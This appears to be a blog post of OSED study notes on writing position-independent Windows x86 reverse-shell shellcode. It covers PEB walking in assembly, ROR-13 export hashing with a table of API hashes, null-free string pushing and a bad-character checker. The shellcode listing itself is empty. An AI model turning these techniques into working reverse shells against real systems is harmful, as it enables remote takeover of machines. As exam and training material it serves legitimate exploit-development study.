OSED Notes: Writing Custom Shellcode From Scratch

I'm working through OSED right now, and the single biggest wall most people hit is stop reaching for msfvenom. The course expects you to write your own shellcode — bytes that survive your bad-character filter, fit in your buffer, and don't import a single function the loader has to fix up.

This post is the lab notebook version of how I build a working cmd.exe reverse shell for Windows x86 from scratch. The final shellcode in this post is ~280 bytes, has no null bytes, no 0x0a, no 0x0d, and resolves every API by hash at runtime.

The constraints

Before any byte gets written, define the contract:

Listing — constraints.txt

\x20, \x25, \x26, \x2b, \x3d are the kind of badchars you find in URL- or HTTP-decoded buffers. We bake the constraints into the egg.

The plan in pictures

A reverse shell on Windows is six syscalls in a trench coat. Here's the flow:

Fig. 1.Reverse shell control flow. Each box is one resolved-by-hash Win32 API.

Walking the PEB

The first thing position-independent shellcode has to do on Windows is find a base address. We can't call kernel32.dll!LoadLibraryA if we don't even know where kernel32.dll is loaded.

Every running process has a Process Environment Block. On x86 it's at fs:[0x30], and chasing pointers from there gets us a doubly-linked list of loaded modules. The third entry in InMemoryOrderModuleList is kernel32.dll.

; nasm syntax
xor    eax, eax              ; eax = 0
mov    eax, [fs:eax + 0x30]  ; PEB
mov    eax, [eax + 0x0c]     ; PEB_LDR_DATA
mov    eax, [eax + 0x14]     ; InMemoryOrderModuleList.Flink
mov    eax, [eax]            ; ntdll
mov    eax, [eax]            ; kernel32 entry
mov    ebx, [eax + 0x10]     ; ebx = kernel32 base address

The offsets here are stable across modern Windows. They're documented in winternl.h, and yes, they break on WoW64 in nasty ways — but for plain x86 user-mode they hold.

Resolving APIs by hash

We don't want a literal string "LoadLibraryA" in our shellcode for two reasons: (1) it's bytes we have to import that AV hates, and (2) we'd need to push it on the stack anyway. So instead we hash. The classic algorithm is ROR-13 with running sum:

def ror13(name: bytes) -> int:
    h = 0
    for c in name:
        h = ((h >> 13) | (h << (32 - 13))) & 0xFFFFFFFF
        h = (h + c) & 0xFFFFFFFF
    return h

Run that against every API you need and bake the 4-byte hash into your shellcode. Then at runtime the shellcode walks the export address table of kernel32.dll, hashes each name, and compares against the hash you embedded.

LoadLibraryA   -> 0x0726774C
GetProcAddress -> 0x7C0DFCAA
WSAStartup     -> 0x006B8029
WSASocketA     -> 0xE0DF0FEA
connect        -> 0x6174A599
CreateProcessA -> 0x16B3FE72
ExitProcess    -> 0x73E2D87E

Pitfall I keep hitting: be careful which DLL exports each function. connect lives in ws2_32.dll, not kernel32.dll. Your hash-walker has to scan the right module — that's why the first job after PEB walk is LoadLibraryA("ws2_32").

Stack-pushing strings without nulls

"ws2_32" is 7 chars. We need a null-terminator on the stack but no nulls in the shellcode itself. Trick: push the string as DWORDs, with the high byte of the last push set up so the trailing zero comes from a register XOR:

xor    edx, edx
push   edx                 ; null terminator
push   0x32335f32           ; "2_32"
push   0x73770000 | 0x7773  ; "ws"  + zero filler — careful!

The cleaner way most people use is to push backwards and zero out a single byte from a register at the right spot. The point is: never let \x00 show up in the bytes you actually emit.

The annotated final blob

After assembly + encoding, here's a slice of the final shellcode (truncated; full file in the repo):

Listing — shellcode.bin (slice)

I verify it survives my badchar set with a one-liner:

python3 -c "import sys; bad=b'\\x00\\x0a\\x0d\\x20\\x25\\x26\\x2b\\x3d'; \
  data=open('shellcode.bin','rb').read(); \
  print('CLEAN' if not any(b in data for b in bad) else 'DIRTY: %r' % \
  [hex(b) for b in data if b in bad])"

Then I plug it into a tiny C harness and watch nc on my attacker box light up:

Listing — attacker@kali

Things OSED candidates burn time on

A list of mistakes I made so you don't have to:

Forgetting that x86 stack alignment matters for some APIs. WSASocketA will silently fail with WSAEFAULT if your LPWSAPROTOCOL_INFOW pointer isn't where it expects. Push 0s, don't trust whatever was on the stack.
Hashing case-sensitive. Windows export names are case-sensitive. loadlibrarya and LoadLibraryA hash differently. Use the exact string from dumpbin /exports.
Embedding a null byte in your hash table. 0x00ABCDEF will tank your shellcode. Re-roll the hash function (different rotation count) or alphabet-pad the API name until the hash has no zero byte.
CreateProcessA's STARTUPINFO is 0x44 bytes. Zero all of it, then patch the three fields you need: cb, dwFlags = 0x100 (USESTDHANDLES), and hStdInput/Output/Error = socket.

Wrapping up

OSED doesn't reward speed — it rewards understanding. Every piece of "magic" in your shellcode should be something you can explain. If you're staring at a hash table and you don't know which DLL each function comes from, stop coding and read winternl.h for an hour. Future you will thank past you.

I'll publish the full reusable assembly source + encoder in a follow-up post. In the meantime, the Active Directory attack-paths post shows what you do after the shellcode lands.